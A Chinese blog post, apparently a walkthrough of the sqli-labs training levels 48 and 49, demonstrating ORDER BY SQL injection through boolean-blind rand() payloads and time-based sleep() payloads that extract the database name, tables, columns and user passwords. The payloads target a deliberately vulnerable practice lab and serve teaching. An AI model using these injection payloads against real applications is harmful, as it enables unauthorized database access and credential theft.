(手工)【sqli-labs48、49】order by注入、盲注、GET注入

已于 2022-07-16 14:35:06 修改
阅读量541 收藏 2
点赞数
分类专栏: # 【全】sqlil-abs靶场 文章标签: web安全 数据库 sql
于 2022-07-16 13:53:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53079406/article/details/125817667
版权

目录

一、推荐:

二、(手工)SQL注入基本步骤:

三、Less48(GET-Error based -Blind - Numeric - ORDER BY CLAUSE)

3.1、简介:(order by注入-盲注-POST注入)

3.1、第一步:注入点测试

 3.3、第二步:分析过滤

3.4、第三步:判断字段数/回显位

3.5、第四步:暴库

3.6、第五步:爆表名

3.7、第六步:爆字段

3.9、第八步:爆数据

四、Less49(GET-Error based - String - Blind ORDER BY CLAUSE)

4.1、简介:(order by注入-盲注-POST注入)

4.2、利用:

一、推荐:

【SQL注入】order by 注入:联合盲注、报错、堆叠注入https://blog.csdn.net/qq_53079406/article/details/125815205?spm=1001.2014.3001.5501https://blog.csdn.net/qq_53079406/article/details/125815205?spm=1001.2014.3001.5501

【SQL注入】堆叠注入https://blog.csdn.net/qq_53079406/article/details/125798787?spm=1001.2014.3001.5501https://blog.csdn.net/qq_53079406/article/details/125798787?spm=1001.2014.3001.5501https://blog.csdn.net/qq_53079406/article/details/125798787?spm=1001.2014.3001.5501【SQL注入】数字型注入 & 字符型注入https://blog.csdn.net/qq_53079406/article/details/125741101?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786402616781435435338%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786402616781435435338&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-125741101-null-null.185%5Ev2%5Econtrol&utm_term=%E6%95%B0%E5%AD%97%E5%9E%8B&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/125741101?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786402616781435435338%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786402616781435435338&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-125741101-null-null.185%5Ev2%5Econtrol&utm_term=%E6%95%B0%E5%AD%97%E5%9E%8B&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/125741101?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786402616781435435338%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786402616781435435338&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-125741101-null-null.185%5Ev2%5Econtrol&utm_term=%E6%95%B0%E5%AD%97%E5%9E%8B&spm=1018.2226.3001.4450

【SQL注入-无回显】布尔盲注:原理、函数、利用过程https://blog.csdn.net/qq_53079406/article/details/125275974?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786796416782248562911%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786796416782248562911&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-5-125275974-null-null.185%5Ev2%5Econtrol&utm_term=%E7%9B%B2%E6%B3%A8&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/125275974?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786796416782248562911%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786796416782248562911&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-5-125275974-null-null.185%5Ev2%5Econtrol&utm_term=%E7%9B%B2%E6%B3%A8&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/125275974?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786796416782248562911%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786796416782248562911&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-5-125275974-null-null.185%5Ev2%5Econtrol&utm_term=%E7%9B%B2%E6%B3%A8&spm=1018.2226.3001.4450【SQL注入-无回显】时间盲注:原理、函数、利用过程https://blog.csdn.net/qq_53079406/article/details/125096394?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786796416782248562911%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786796416782248562911&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-3-125096394-null-null.185%5Ev2%5Econtrol&utm_term=%E7%9B%B2%E6%B3%A8&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/125096394?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786796416782248562911%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786796416782248562911&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-3-125096394-null-null.185%5Ev2%5Econtrol&utm_term=%E7%9B%B2%E6%B3%A8&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/125096394?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786796416782248562911%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786796416782248562911&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-3-125096394-null-null.185%5Ev2%5Econtrol&utm_term=%E7%9B%B2%E6%B3%A8&spm=1018.2226.3001.4450

二、(手工)SQL注入基本步骤:

第一步:注入点测试

第二步:分析权限

第三步:判断字段数

第四步:爆数据库名

第五步:爆表名

第六步:爆字段名

第七步:爆数据

三、Less48(GET-Error based -Blind - Numeric - ORDER BY CLAUSE)

3.1、简介:(order by注入-盲注-GET注入)

请求方法:GET

方法:order by注入+盲注+数字型注入

3.1、第一步:注入点测试

按照提示输入?sort=1

输入'

页面不正常,说明存在注入点

没有报错,可以采取盲注(布尔盲注、时间盲注)

?sort=rand(true)

?sort=rand(false)

 可以采取布尔盲注

 3.3、第二步:分析过滤

方法一:

考虑一步一步将注入语句字符一个一个替换掉,直到不报错(浪费时间)

或者全部替换(如果报错,不知道哪里被过滤了)

方法二:

获取源码进行白盒审计(最优)

3.4、第三步:判断字段数/回显位

?sort=3

回显正常

 ?sort=4

报错

 说明有3个字段

3.5、第四步:暴库

?sort=rand(left(database(),1)>'s')

得到的结果与rand(false)相同

说明这个条件错误

 最后推出

?sort=rand(left(database(),1)='s')

与rand(true)结果相同

说明条件正确

 得到第一个字符是s

以此类推得到security

(通过改变判断的位置)

或者(时间盲注)

?sort=1 and if(substr(database(),1,1)='s',sleep(5),0)

3.6、第五步:爆表名

?sort=rand(left((select group_concat(table_name) from information_schema.tables where table_schema=database()),1)>'e')

得到的结果与rand(false)相同

说明这个条件错误

?sort=rand(left((select group_concat(table_name) from information_schema.tables where table_schema=database()),1)='e')

与rand(ture)返回相同

说明条件正确

分别挨个推出表

emails  referers  uagents  users

或者(时间盲注)

?sort=1 and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(5),0)


 

3.7、第六步:爆字段

?sort=rand(left((select group_concat(column_name) from information_schema.columns where table_name='users'),1)>'u')

得到的结果与rand(false)相同

说明这个条件错误

?sort=rand(left((select group_concat(column_name) from information_schema.columns where table_name='users'),1)='u')

与rand(ture)返回相同

说明条件正确

依此类推得到字段

或者(时间盲注)

?sort=1 and if(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)='u',sleep(5),0)

3.9、第八步:爆数据

?sort=rand(left((select group_concat(password) from security.users),1)>'1')

得到的结果与rand(false)相同

说明这个条件错误

?sort=rand(left((select group_concat(password) from security.users),1)='1')

与rand(ture)返回相同

说明条件正确

或者(时间盲注)

?sort=1 and if(substr((select group_concat(username,password) from security.users limit 0,1),1,1)='d',sleep(5),0)

四、Less49(GET-Error based - String - Blind ORDER BY CLAUSE)

4.1、简介:(order by注入-盲注-GET注入)

请求方法:GET

方法:order by注入+盲注+字符型注入

4.2、利用:

与Less48相比

需要闭合'

黑色地带(崛起)
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQL注入基础---order by \ limit \ 宽字节注入
qq_52016943的博客
08-09 1236
order by 、limit 、宽字节注入
sqli-labs Less-46、47、48、49sqli-labs闯关指南 46、47、48、49)—order by 相关注入
m0_54899775的博客
12-28 1149
sqli-labs Less-46、47、48、49sqli-labs闯关指南 46、47、48、49)—order by 相关注入
手工)【sqli-labs40、41】堆叠注入盲注
07-15 1673
SQL-堆叠、盲注
SQL注入order by注入
qq_68163788的博客
01-30 2263
Order by注入是一种SQL注入攻击的类型,它利用了在SQL查询中使用order by子句来对结果进行排序的漏洞。在正常情况下,order by子句会根据指定的列对结果进行排序,但是如果应用程序没有对用户提供的输入进行正确的验证和过滤,攻击者就可以利用这个漏洞来执行恶意的SQL查询。 通过在order by子句中插入恶意的SQL代码,攻击者可以获取敏感数据、修改数据库内容或者执行其他恶意操作。例如,攻击者可以利用order by注入来发现数据库中的表名、列名或者获取敏感数据。
sql注入order by注入
qq_45627785的博客
08-05 4975
Jan 1, 0001 00:00 · 427 words · 3 minute readCTF 了解order by order by盲注 结合union来盲注 基于if()盲注 需要知道列名 不需要知道列名 基于时间的盲注 基于rang()的盲注 order by 报错注入 updatexml extractvalue 在安恒杯看到了利用order by进行盲注,记得自己之前好像总结过order by后的注入方法,翻..
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
最新发布
m0_73615178的博客
02-24 1401
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
SQLi-Labs系列之GET型盲注
ChuMeng1999的博客
10-27 396
phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境。
sqli-labs第九关延迟注入脚本
weixin_42750666的博客
04-01 683
import requests import string def timeOut(url): #判断是否延时 try: res=requests.get(url,timeout=3) return "No" except Exception as e: return "TimeOut" def get_dbNa...
sql二次注入-sqli-labs第13关
weixin_46784800的博客
11-04 973
获取数据操作 判断所查询数据库中包含的列数 采用post进行参数输入: uname=') order by 3 -- - &passwd=') -- - 通过对查询结果进行排序,发现无法对第三列进行排序,且报错Unknown column ‘3’ in ‘order clause’,则说明所查询数据库中共有两列数据。 判断输出数据与数据库的联系 输入语句 uname=') or 1=1 -- - &passwd=') -- - 可发现界面只有登录成功的提示,则说明该网站为盲注,则
SQL注入ORDER BY注入
m0_74834253的博客
02-22 2553
使用ORDER BY语句不仅支持对单列数据的排序,还支持对数据表中多列数据的排序。需要注意的是这样注入的效率很低,还是应该先考虑其他的注入方式最后在采用时间盲注order by还支持多个字段自定义排序,通过逗号隔开,但只能在数字之间进行自定义排序,若选择字符类型则会根据第一个列名的排序规则进行排序。为true或者false时,排序结果是不同的,但因为序列相同所以就可以使用rand()函数进行盲注了。
mysql order by注入_sql注入order by注入
weixin_28882177的博客
01-19 4841
0x00 前言夜里看了一篇文章,突然有了启发,赶紧记录一下。了解order by参考:order by是mysql中对查询数据进行排序的方法, 使用示例select * from 表名 order by 列名(或者数字) asc;升序(默认升序)select * from 表名 order by 列名(或者数字) desc;降序这里的重点在于order by后既可以填列名或者是一个数字。举个例子:...
SQL注入进阶-order by注入
AkangBoy的博客
11-06 8861
本文从order by原理简介开始,详细描述了order by注入原理以及多种注入姿势,包含order by union select注入order by if()注入order by sleep()注入order by报错注入
Mysql Order By 注入总结
vspiders的博客
10-22 2506
前言 最近在做一些漏洞盒子后台项目的总结,在盒子多期众测项目中,发现注入类的漏洞占比较大。其中Order By注入型的漏洞也占挺大一部分比例,这类漏洞也是白帽子乐意提交的类型(奖金高、被过滤概率小)。今天给大家分享下一些关于Order By的有趣的经验。 何为order by 注入 本文讨论的内容指可控制的位置在order by子句后,如下order参数可控:select * f
宽字节注入原理分析
热门推荐
1stPeak's Blog
06-07 1万+
什么是宽字节? 如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,成为宽字节。 像GB2312、GBK、GB18030、BIG5、Shift_JIS等这些编码都是常说的宽字节,也就是只有两字节 英文默认占一个字节,中文占两个字节 什么是宽字节注入? 原理: 宽字节注入是利用了mysql的一个特性,即mysql在使用GBK编码时,在url解码时会认为两个字符是一个汉字(前一个ASCII码要大于128,才表示到汉字的范围) 通常情况下,一个utf-8编码的汉子占用3个字节,一个GBK编
sql注入中的order by
内心不种满鲜花就会长满杂草
03-14 9999
联合查询中的order by ,相必于大家都不会陌生。ORDER BY 语句用于根据指定的列对结果集进行排序。如有一个表Orders如下 1. 按照字母的顺序显示公司名称 SELECT Company, OrderNumber FROM Orders ORDER BY Company 结果如下,按照公司名字首字母升序进行排序 其实上面的order by Company可以写成order by 1 ,即以表的第一列Company进行排序,order by n,即以表的第n列排序,当排序的那.
mysql order by sql注入_萌新的手工sql注入入门--mysql(普通sql注入篇)
weixin_33613571的博客
01-21 420
sql注入主要分为普通的sql注入,还有盲注这一篇主要是记录普通的sql注入sql注入的主要流程:1.寻找注入点/判断该表单是否可注入:主要运用的方法是,构造错误的语句(在正常输入的后面加上如单引号等敏感符号)如:1’ ,1#等同时,注入类型分为三类,数字类,字符类,还有如like%%等搜索函数根据返回的结果进行判断是普通的sql注入还是盲注。2.找到注入点之后,利用order by 猜解字段个数...
SQL 注入 OrderBy/0ctf simplesqlin
weixin_30340819的博客
03-26 148
https://www.cnblogs.com/claricre/p/6187672.html http://www.w3school.com.cn/sql/sql_orderby.asp 1. select 字段列表/* from 表名 where 条件 order by 字段名1 asc/desc, 字段名2 asc/desc,....... 2. select 字段列表/* fro...
【ctf】sql注入——order by的注入
wlllllianqing的博客
10-03 423
order by的注入 这里我们先介绍一下逻辑运算符 逻辑运算符是按位进行运算的 首先将十进制转化为二进制,再进行按位运算; ORDER BY(1,2,3…) 语句 ORDER BY 语句用于对结果集进行排序。 ORDER BY 语句用于根据指定的列对结果集进行排序。 ORDER BY 语句默认按照升序对记录进行排序。 在不知道列名的情况可以用序号来指代相应的列。 asc:正序输出; desc:逆序输出; select * from user order by id desc 但有一点,order by
PHP与Apache环境下部署SQL注入靶场sqli-labs指南
部署sqli-labs是一个实战训练过程,它不仅提供了丰富的SQL注入实例,还能帮助开发者熟悉如何防范此类攻击,是提升网络安全技能的实用工具。通过这个靶场,你将更深入理解Web应用程序安全的重要性,并掌握如何在实际...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值